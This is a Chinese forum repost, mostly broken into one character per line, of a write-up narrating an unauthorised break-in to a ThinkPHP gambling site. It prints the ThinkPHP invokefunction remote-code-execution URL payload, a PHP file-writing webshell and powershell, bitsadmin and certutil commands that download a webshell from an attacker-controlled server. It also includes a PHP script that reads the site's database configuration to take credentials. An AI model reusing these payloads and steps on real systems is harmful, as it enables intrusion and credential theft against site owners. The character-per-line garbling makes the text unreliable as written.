论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[18302] 2021-03-02_实战对某BC网站的一次渗透测试
文档创建者:
s7ckTeam
浏览次数:
3
最后更新:
2025-01-18
渗透测试
3 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2021-03-02_实战对某BC网站的一次渗透测试
实
战
|
对
某
B
C
网
站
的
一
次
渗
透
测
试
T
T
H
A
C
K
之
道
2
0
2
1
-
0
3
-
0
2
前
言
前
言
无
意
间
发
现
一
个
t
h
i
n
k
p
h
p
的
菠
菜
赌
博
站
,
最
近
t
p
不
是
刚
好
有
个
漏
洞
吗
?
然
后
就
顺
手
测
试
了
一
下
,
但
过
程
并
不
太
顺
利
,
不
过
最
后
还
是
拿
下
了
,
所
以
特
发
此
文
分
享
下
思
路
。
0
x
0
0
一
键
一
键
g
e
t
s
h
e
l
l
?
?
简
单
看
了
下
,
应
该
有
不
少
人
玩
吧
?
又
有
多
少
人
被
坑
的
妻
离
子
散
。
。
。
正
好
前
几
天
写
了
个
测
试
工
具
,
先
掏
出
来
测
试
一
发
。
工
具
显
示
存
在
漏
洞
作
者
:
T
T
来
源
:
i
春
秋
社
区
一
键
g
e
t
s
h
e
l
l
,
看
起
来
很
顺
利
的
样
子
,
哈
哈
。
但
是
.
.
.
小
明
甩
了
下
头
发
,
发
现
事
情
并
不
简
单
。
菜
刀
连
接
的
时
候
,
返
回
5
0
0
错
误
。
我
们
用
火
狐
的
h
a
c
k
b
a
r
验
证
下
,
没
毛
病
啊
,
那
为
什
么
菜
刀
连
接
不
上
呢
?
作
为
菜
逼
的
我
不
禁
陷
入
了
沉
思
.
.
.
0
x
0
1
开
始
分
析
开
始
分
析
因
为
这
个
工
具
我
自
己
写
的
,
从
上
面
g
e
t
s
h
e
l
l
的
图
片
中
发
现
调
用
的
是
第
三
个
e
x
p
,
那
么
我
们
来
分
析
下
看
看
。
p
o
c
如
下
我
们
在
p
o
c
后
面
输
入
w
h
o
a
m
i
看
看
权
限
。
i
i
s
权
限
但
是
可
以
执
行
部
分
命
令
,
比
如
e
c
h
o
d
i
r
等
等
。
/
?
s
=
i
n
d
e
x
/
t
h
i
n
k
a
p
p
/
i
n
v
o
k
e
f
u
n
c
t
i
o
n
&
f
u
n
c
t
i
o
n
=
c
a
l
l
_
u
s
e
r
_
f
u
n
c
_
a
r
r
a
y
&
v
a
r
s
[
0
]
=
s
y
s
t
e
m
&
v
a
r
s
[
1
]
[
]
=
d
i
r
/
?
s
=
i
n
d
e
x
/
t
h
i
n
k
a
p
p
/
i
n
v
o
k
e
f
u
n
c
t
i
o
n
&
f
u
n
c
t
i
o
n
=
c
a
l
l
_
u
s
e
r
_
f
u
n
c
_
a
r
r
a
y
&
v
a
r
s
[
0
]
=
s
y
s
t
e
m
&
v
a
r
s
[
1
]
[
]
=
w
h
o
a
m
i
0
x
0
2
尝
试
突
破
拿
尝
试
突
破
拿
s
h
e
l
l
既
然
可
以
执
行
e
c
h
o
那
么
我
们
可
以
来
尝
试
写
入
个
小
马
试
试
,
如
果
成
功
的
话
,
再
利
用
小
马
上
传
大
马
,
说
干
就
干
,
苦
活
来
了
,
我
们
得
一
行
一
行
写
入
进
去
。
注
意
:
代
码
中
的
<
>
符
号
,
要
用
^
^
转
义
。
比
如
<
?
p
h
p
转
义
为
^
<
^
?
p
h
p
逐
行
写
入
完
成
后
,
访
问
的
时
候
发
现
并
不
能
正
常
运
行
,
这
里
忘
记
截
图
了
。
。
接
下
来
尝
试
用
以
下
方
法
下
载
文
件
到
服
务
器
上
也
失
败
了
。
<
?
p
h
p
h
e
a
d
e
r
(
"
c
o
n
t
e
n
t
-
T
y
p
e
:
t
e
x
t
/
h
t
m
l
;
c
h
a
r
s
e
t
=
g
b
2
3
1
2
"
)
;
i
f
(
g
e
t
_
m
a
g
i
c
_
q
u
o
t
e
s
_
g
p
c
(
)
)
f
o
r
e
a
c
h
(
$
_
P
O
S
T
a
s
$
k
=
>
$
v
)
$
_
P
O
S
T
[
$
k
]
=
s
t
r
i
p
s
l
a
s
h
e
s
(
$
v
)
;
?
>
<
f
o
r
m
m
e
t
h
o
d
=
"
P
O
S
T
"
>
保
存
文
件
名
:
<
i
n
p
u
t
t
y
p
e
=
"
t
e
x
t
"
n
a
m
e
=
"
f
i
l
e
"
s
i
z
e
=
"
6
0
"
v
a
l
u
e
=
"
<
?
e
c
h
o
s
t
r
_
r
e
p
l
a
c
e
(
'
'
,
'
/
'
,
_
_
F
I
L
E
_
_
)
?
>
"
>
<
b
r
>
<
b
r
>
<
t
e
x
t
a
r
e
a
n
a
m
e
=
"
t
e
x
t
"
C
O
L
S
=
"
7
0
"
R
O
W
S
=
"
1
8
"
>
<
/
t
e
x
t
a
r
e
a
>
<
b
r
>
<
b
r
>
<
i
n
p
u
t
t
y
p
e
=
"
s
u
b
m
i
t
"
n
a
m
e
=
"
s
u
b
m
i
t
"
v
a
l
u
e
=
"
保
存
"
>
<
f
o
r
m
>
<
?
p
h
p
i
f
(
i
s
s
e
t
(
$
_
P
O
S
T
[
'
f
i
l
e
'
]
)
)
{
$
f
p
=
@
f
o
p
e
n
(
$
_
P
O
S
T
[
'
f
i
l
e
'
]
,
'
w
b
'
)
;
e
c
h
o
@
f
w
r
i
t
e
(
$
f
p
,
$
_
P
O
S
T
[
'
t
e
x
t
'
]
)
?
'
保
存
成
功
!
'
:
'
保
存
失
败
!
'
;
@
f
c
l
o
s
e
(
$
f
p
)
;
}
?
>
正
当
我
打
算
放
弃
的
时
候
,
我
想
起
来
还
有
个
下
载
的
命
令
没
用
。
那
就
是
c
e
r
t
u
t
i
l
.
e
x
e
说
干
就
干
,
把
大
马
放
到
我
们
服
务
器
上
,
开
启
H
F
S
。
然
后
执
行
以
下
命
令
。
成
功
进
入
大
马
,
不
过
别
高
兴
太
早
。
p
o
w
e
r
s
h
e
l
l
下
载
注
意
:
内
核
5
.
2
以
下
版
本
可
能
无
效
p
o
w
e
r
s
h
e
l
l
(
n
e
w
-
o
b
j
e
c
t
S
y
s
t
e
m
.
N
e
t
.
W
e
b
C
l
i
e
n
t
)
.
D
o
w
n
l
o
a
d
F
i
l
e
(
'
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
7
4
.
1
4
5
/
s
s
s
s
2
.
e
x
e
'
,
'
C
:
s
s
s
s
2
.
e
x
e
'
)
b
i
t
s
a
d
m
i
n
下
载
b
i
t
s
a
d
m
i
n
/
t
r
a
n
s
f
e
r
n
h
t
t
p
:
/
/
b
a
i
d
u
.
c
o
m
/
P
S
T
o
o
l
s
.
z
i
p
C
:
P
S
T
o
o
l
s
.
z
i
p
注
意
:
不
支
持
h
t
t
p
s
、
f
t
p
协
议
,
使
用
k
a
l
i
的
s
i
m
p
l
e
h
t
t
p
s
e
r
v
e
r
作
服
务
器
会
报
错
c
e
r
t
u
t
i
l
.
e
x
e
-
s
p
l
i
t
-
u
r
"
l
c
"
a
c
h
e
-
f
h
t
t
p
:
/
/
w
w
.
b
a
i
d
u
.
c
o
m
/
s
v
c
h
o
s
t
.
e
x
e
s
v
c
h
o
s
t
.
e
x
e
小
明
再
次
甩
了
下
头
发
,
发
现
事
情
更
不
简
单
.
.
.
.
大
马
可
以
操
作
文
件
上
传
改
名
等
等
,
但
是
无
法
编
辑
文
件
,
无
法
查
看
文
件
源
码
等
等
,
点
开
显
示
一
片
空
白
。
既
然
这
样
,
那
么
我
们
进
数
据
库
看
看
吧
。
我
们
都
知
道
t
p
的
数
据
库
配
置
文
件
在
以
下
这
个
位
置
大
马
是
无
法
打
开
了
,
那
么
我
们
可
以
用
t
p
的
命
令
执
行
漏
洞
尝
试
用
t
y
p
e
命
令
去
读
取
这
个
文
件
。
尝
试
t
y
p
e
读
取
失
败
,
然
后
又
想
到
c
o
p
y
命
令
。
把
d
a
t
a
b
a
s
e
.
p
h
p
拷
贝
到
w
e
b
根
目
录
下
,
改
名
为
1
.
t
x
t
拷
贝
完
成
以
后
访
问
u
r
l
/
1
.
t
x
t
,
发
现
里
面
是
空
的
。
/
a
p
p
l
i
c
a
t
i
o
n
/
d
a
t
a
b
a
s
e
.
p
h
p
/
?
s
=
i
n
d
e
x
/
t
h
i
n
k
a
p
p
/
i
n
v
o
k
e
f
u
n
c
t
i
o
n
&
f
u
n
c
t
i
o
n
=
c
a
l
l
_
u
s
e
r
_
f
u
n
c
_
a
r
r
a
y
&
v
a
r
s
[
0
]
=
s
y
s
t
e
m
&
v
a
r
s
[
1
]
[
]
=
t
y
p
e
c
:
w
w
w
a
p
p
l
i
c
a
t
i
o
n
d
a
t
a
b
a
s
e
.
p
h
p
/
?
s
=
i
n
d
e
x
/
t
h
i
n
k
a
p
p
/
i
n
v
o
k
e
f
u
n
c
t
i
o
n
&
f
u
n
c
t
i
o
n
=
c
a
l
l
_
u
s
e
r
_
f
u
n
c
_
a
r
r
a
y
&
v
a
r
s
[
0
]
=
s
y
s
t
e
m
&
v
a
r
s
[
1
]
[
]
=
c
o
p
y
c
:
w
w
w
a
p
p
l
i
c
a
t
i
o
n
d
a
t
a
b
a
s
e
.
p
h
p
c
:
w
w
w
p
u
b
l
i
c
1
.
t
x
t
0
x
0
3
成
功
突
破
成
功
突
破
经
历
了
一
系
列
的
失
败
后
,
我
冷
静
下
来
想
了
下
,
我
们
还
可
以
用
f
i
l
e
_
p
a
t
h
去
读
取
源
码
试
试
。
用
大
马
上
传
这
个
文
件
到
根
目
录
下
,
然
后
访
问
,
成
功
拿
到
数
据
库
配
置
信
息
。
然
后
填
写
好
配
置
信
息
,
进
入
数
据
库
。
<
?
p
h
p
$
f
i
l
e
_
p
a
t
h
=
'
c
:
/
w
w
w
/
a
p
p
l
i
c
a
t
i
o
n
/
d
a
t
a
b
a
s
e
.
p
h
p
'
;
i
f
(
f
i
l
e
_
e
x
i
s
t
s
(
$
f
i
l
e
_
p
a
t
h
)
)
{
$
f
p
=
f
o
p
e
n
(
$
f
i
l
e
_
p
a
t
h
,
'
r
'
)
;
$
s
t
r
=
f
r
e
a
d
(
$
f
p
,
f
i
l
e
s
i
z
e
(
$
f
i
l
e
_
p
a
t
h
)
)
;
e
c
h
o
$
s
t
r
=
s
t
r
_
r
e
p
l
a
c
e
(
'
r
n
'
,
'
<
b
r
/
>
'
,
$
s
t
r
)
;
}
?
>
此
文
写
到
这
里
已
经
夜
深
人
静
,
看
着
桌
子
上
吃
了
一
半
的
泡
面
,
最
后
喝
了
两
口
汤
,
关
机
,
睡
觉
.
.
.
.
.
.
后
记
后
记
本
文
纯
属
虚
构
,
如
有
雷
同
,
拒
绝
查
水
表
。
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
E
N
D
●
干
货
|
渗
透
学
习
资
料
大
集
合
(
书
籍
、
工
具
、
技
术
文
档
、
视
频
教
程
)
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试